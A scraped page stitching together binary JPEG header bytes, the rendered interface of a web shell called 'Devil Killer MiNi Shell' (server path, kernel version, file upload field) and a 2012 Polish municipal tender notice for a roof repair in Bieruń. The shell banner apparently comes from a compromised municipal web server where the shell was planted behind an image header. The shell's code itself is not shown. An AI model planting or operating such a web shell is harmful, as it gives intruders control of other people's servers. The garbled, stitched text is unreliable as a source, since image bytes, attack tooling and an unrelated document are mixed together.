JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121113/239143-N-2012.html

<p class="kh_header"><b>Bieruń: Remont dachu  wraz ze zmianą konstrukcji nośnej nad sala główną  budynku  Jutrzenki przy ul. Spiżowej  4 w Bieruniu</b><br>
<b>Numer ogłoszenia: 239143 - 2012; data zamieszczenia: 13.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu  wraz ze zmianą konstrukcji nośnej nad sala główną  budynku  Jutrzenki przy ul. Spiżowej  4 w Bieruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont dachu (ok. 377 m2 powierzchni dachu) wraz ze zmianą konstrukcji nośnej nad salą główną budynku Jutrzenki w Bieruniu przy ul. Spiżowej 4 . Zamawiający dla przedmiotowego remontu posiada pozwolenie na budowę. Budynek usytuowany jest w obrębie starówki rynku, charakteryzującej się wąskimi ulicami bocznymi.
 
A. Zakres rzeczowy zamówienia określono w  przedmiarze robót i obejmuje w szczególności : 
      1) demontaż oświetlenia  i instalacji związanych z konstrukcją dachu,
      2) demontaż przewodów wentylacji,
      3) demontaż sufitu podwieszonego , pomostów komunikacyjnych nad salą główną,
4) demontaż ściany działowej  między przestrzenią nadscenia  a poddaszem nad salą główną,
5) rozbiórkę pokrycia  z papy, rynien i rur spustowych,
6) rozbiórkę konstrukcji dachu,
7) rozbiórkę ściany pulpitowej ( elewacja południowa) do poziomu posadowienia konstrukcji,    
   wraz z narożnikami ścian szczytowych i kominem,
8)	wykonanie wieńca żelbetowego 25 x 25 cm
9)	wykonanie rdzeni żelbetowych, 
10)	wykonanie więźby dachowej drewnianej, 
11)	 deskowanie dachu płyta OSB ,
12)	Ocieplenie dachu wełną mineralną gr. 15 cm
13)	pokrycie dachu blachą miedzianą gr. 0,57 mm,
14)	montaż obróbek blacharskich z blachy miedzianej gr 0,7 mm,
15)	montaż rynien fi 150 mm i rur spustowych fi 120 mm z PCV mocowanych do haków z blachy miedzianej,
16)	montaż drzwi stalowych o odporności EI30z wypełnieniem ze styropianu lub wełny mineralnej,
17)	docieplenie ściany zewnętrznej południowej oraz ściany szczytowej wschodniej  styropianem gr. 15 cm,
18)	renowacja gzymsu i cokołu,
19)	montaż wentylacji nawiewnej,
20)	wymianę wentylatorów dachowych,
21)	wykonanie instalacji elektrycznej i odgromowej,
22)	montaż elementów wyposażenia  m.in. kurtyna.

   B. Zakres zamówienia obejmuje również :
1)	Rusztowanie na całej powierzchni sali głównej.
2)	Zabezpieczenie budynku przed wpływem czynników atmosferycznych na okres od demontażu istniejącego pokrycia do wykonania nowego.
3)	Zabezpieczenie  przewodów instalacji  elektrycznych  i niskoprądowych w korytach kablowych przebiegających przez poddasze.
4)	Zabezpieczenie zbiornika wyrównawczego i przewodów instalacji CO w nadsceniu.
5)	Zabezpieczenie elementów wystroju wnętrz w szczególności oświetlenie (kinkiety), nagłośnienie, klimatyzatory, drewniane i mosiężne elementy wykończenia wnętrz .
6)	Zabezpieczenie posadzki  parteru przed uszkodzeniami.
7) Doprowadzenie terenu lub budynku z którego prowadzone będą roboty do stanu pierwotnego oraz naprawienie wszelkich powstałych w związku  z prowadzonymi pracami uszkodzeń.
8) Wykonanie wszystkich niezbędnych badań i sprawdzeń wynikających ze Specyfikacji Technicznej 
         Wykonania i Odbioru Robót Budowlanych (STWiORB), nie ujętych w przedmiarze robót.
     9) Zajęcie pasa drogowego.


C.	Informacje uzupełniające 
W cenie ofertowej należy uwzględnić wszystkie koszty wynikłe z zapisów  STWiORB  .   
Jeżeli w STWiORB oraz SIWZ  określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w  specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i art.7 ustawy pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego  lub wyższego poziomu jakościowego, technologicznego i estetycznego.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty, certyfikaty i aprobaty techniczne. Przed wbudowaniem wykonawca przedstawi  świadectwa dopuszczenia do stosowania materiałów i wyrobów do zabudowy - do akceptacji  przez inspektora nadzoru.
Odpowiedzialność wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu zamówienia ma obejmować okres minimum 36 miesięcy, licząc od daty odbioru końcowego przedmiotu zamówienia.
Zamawiający nie przewiduje: zamówień uzupełniających, zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów w rozumieniu ustawy pzp oraz stosowania wymagań określonych w art.29 ust.4 ustawy pzp.
Zamawiający nie dopuszcza składania ofert wariantowych i częściowych. 

Kod Wspólnego Słownika Zamówień CPV : 
45261100-5     Wykonywanie konstrukcji dachowych  
45261210-9     Wykonywanie pokryć dachowych
45261320-3    Kładzenie rynien
45262310-7    Zbrojenie
45262500-6    Roboty murarskie i murowe
45320000-6    Roboty izolacyjne
45331210-1   Instalowanie wentylacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.11.00-5, 45.26.12.10-9, 45.26.13.20-3, 45.26.23.10-7, 45.26.25.00-6, 45.32.00.00-6, 45.33.12.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości  14 000,00 zł ( słownie: czternaścietysięcyzłotych 00/100) musi być wniesione                         w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego.
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271.66.2012 Przetarg nieograniczony na wybór wykonawcy zamówienia  pn. Remont dachu wraz ze zmianą konstrukcji nośnej nad salą główną budynku Jutrzenki przy ul. Spiżowej 4 w Bieruniu .
Określenie - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium ,wpłaconego przelewem, na rachunku zamawiającego.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert.
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, należy wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego
3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie: Wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed  
upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, to w tym 
okresie, roboty budowlane w zakresie budowy, przebudowy lub remontu obiektów kubaturowych o
łącznej wartości min. 500 000,00 zł brutto, w tym co najmniej jedną robotę obejmującą montaż 
więźby prefabrykowanej drewnianej.   
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
      -   oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
 -    wykazu wykonanych robót, w zakresie budowy, przebudowy lub remontu obiektów kubaturowych 
      o łącznej wartości min. 500 000,00 zł brutto, w tym co najmniej jednej roboty obejmującej montaż    
      więźby prefabrykowanej drewnianej, z podaniem  ich rodzaju i wartości, daty i miejsca  
      wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane 
      zgodnie  z  zasadami sztuki budowlanej i prawidłowo ukończone (np. referencji, protokołów 
      końcowych odbioru robót).

Przez wykonali należy rozumieć, że roboty zostały zakończone i odebrane protokołami     końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania
ofert, a  jeżeli okres jest krótszy - w tym okresie. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena  warunku  
nastąpi łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
przedłożonego przez wykonawcę:
   - oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują co najmniej jedną osobą posiadającą uprawnienia  do kierowania robotami     
budowlanymi  w specjalności konstrukcyjno - budowlanej bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
     przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
-	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności                                             odpowiedzialnych za  kierowanie robotami budowlanymi (uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń), wraz  z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, 
   że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
     przedłożonego przez wykonawcę :
- oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A) Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	Posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
B)1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentu, o którym mowa w punkcie  3 Listy wymaganych dokumentów  
       przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
       potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w pkt 1
        niniejszej uwagi.
   2.   Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
 3.    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku                                 
        podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących  
        odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez  
        wykonawcę lub te podmioty.
 4.    Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu ,  potencjale  technicznym ,  osobach        
        zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie    
       od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
    5.  Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów     dotyczących       
         sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny  
         dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  
          warunku.
 6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
     spółki cywilnej) do oferty należy dołączyć : 
a)	 Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera),  
jego zakresu działania  i   uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności  :
-  nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację  zamówienia  i 
  udzielających pełnomocnictwa, 
- nazwę firmy Pełnomocnika/Lidera,
-  zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, 
- czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie  
  zamówienia tzn. co najmniej okres obejmujący realizację zamówienia)  ,
